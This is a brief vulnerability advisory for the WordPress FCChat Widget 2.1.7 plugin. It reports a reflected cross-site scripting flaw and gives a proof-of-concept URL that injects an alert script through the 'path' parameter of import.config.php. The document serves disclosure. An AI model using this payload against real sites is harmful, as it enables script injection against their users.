WordPress FCChat Widget 2.1.7 Reflected Cross-site Scripting

------------------------------------------------------------------------
Software................WordPress FCChat Widget 2.1.7
Vulnerability...........Reflected Cross-site Scripting
Threat Level............Low (1/5)
Download................http://www.fastcatsoftware.com/
Discovery Date..........1/23/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

A reflected cross-site scripting vulnerability in WordPress FCChat
Widget 2.1.7 can be exploited to execute arbitrary JavaScript.


--PoC--

http://localhost/wordpress/wp-content/plugins/fcchat/js/import.config.php?path=%3Cscript%3Ealert(0)%3C/script%3E